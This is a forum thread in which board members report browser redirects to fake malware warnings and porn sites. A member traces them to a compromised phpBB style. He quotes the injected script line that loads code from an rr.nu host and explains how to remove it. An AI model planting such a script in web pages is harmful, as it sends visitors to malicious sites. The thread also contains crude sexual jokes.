WARNING: Mormondiscussions may be compromised

[_Kishkumen]

Isn't Will some kind of hotshot programmer?

Will hasn't got the time, he's about to be published you know....

Ouch.

[_Yoda]

Isn't Will some kind of hotshot programmer?

According to Will. ;-)

His field isn't web programming.

[_Yoda]

Infymus, who has a really broad knowledge in Internet protocol and web programming, said that it looked like it came through advertising. The ad server was hijacked with SQL server.

I tend to agree.

[_Shulem]

I got redirected to some page that said my computer was infected and it showed some typical computer drive icons and a downloading feature was supposedly taking place. I just closed down the browser with task manager.

Paul O

Which browser did that come up on?

I don't know. I use windows XP and Windows Explorer. Just now tried to get on tonight and got redirected to some sick looking porn site with women in it. Christ, Jesus!

Paul O

[_Shulem]

On this page, the Avatars for Dr. Shades, Shulem, Equality, Buffalo and Liz are missing on my computer.
[/b]

OMG! I can see them just fine -- cute boys I'd love to fondle. I guess I should redownload my avatar.

Jesus Christ. This place is falling apart.

Paul O

I JUST REDID MY AVATAR. CAN YOU PEOPLE SEE MY BOYS??

[_Quasimodo]

On this page, the Avatars for Dr. Shades, Shulem, Equality, Buffalo and Liz are missing on my computer.
[/b]

OMG! I can see them just fine -- cute boys I'd love to fondle. I guess I should redownload my avatar.

Jesus Christ. This place is falling apart.

Paul O

I JUST REDID MY AVATAR. CAN YOU PEOPLE SEE MY BOYS??

Yep. Personally I would rather see the gals on that porn site you ran into. Ah well, to each his own.

[_Infymus]

I did a test of this with IE and was redirected to porn.

This does NOT happen with Firefox and adBlock+.

As I told Liz, I suspect wholly that this came in under advertising. It has happened to many sites - including Mormon owned KSL. It happens with the ad server gets hijacked with SQL script. It passes that onto the sites fishing up ads to display. Those get passed onto the browser and whalla, you're redirected to whatever site the script chooses.

People on KSL were being routed to porn sites left and right until they fixed it.

It's pretty hard to hack into a phpBB board without having the admin passwords OR having access to the php code which would mean FTP access at the ISP level.

So I suspect this was off an advertising script. I never saw any redirection here or never had an issue. Why? Because I use Firefox with adBlock+ and I block all advertising I see. I hate advertising to the core, targeted and what not. It's a big peeve of mine.

If you look at the bottom of mormondiscussion's main forum you see:

script type="text/javascript"
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.Joseph Smith' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-873263-1");
pageTracker._trackPageview();
} catch(err) { }</script>

And right at the bottom is this which is causing all of this:

script src="http://eacti41vities.rr.nu/mm.php?d=1" /script

(Note: I removed the < and the > )

The last piece below on his page is causing the redirects. The upper portion is a typical google-analytics.

What shades can do right NOW to stop this is go modify - most likely - his "overallfooter.html" and "overallheader.html" found in his phpBB install under the board style. Look for any crap in there and remove it (most likely the above script, unless it's being injected by bad javascript). Then save it back to the FTP directory. Then go into phpBB cache and delete the old cache files.

The site "eacti41vities.rr.nu" or better, "rr.nu" is a well known spam, bot and hack site. ".nu is the Internet country code top-level domain (ccTLD) assigned to the island state of Niue." Did anyone even know there was a state of Niue?

Anyway, shades, the trouble is in your style "Discussions". It's become compromised. If you want to fix it without my help or Mav's help you CAN go back to your default style. Just log into admin control, go to the STYLES tab, and set your style back to ProSilver (the default).

[_DrW]

Infymus,

OK.

Now I am really impressed.

Nice to know there are folks like you around.

Well done.

[_Stormy Waters]

You can still browse safely if you disable javascript in your browser.

Edited to add: With javascript enabled I was still getting rerouted

[_Spurven Ten Sing]

Still getting routed to porn.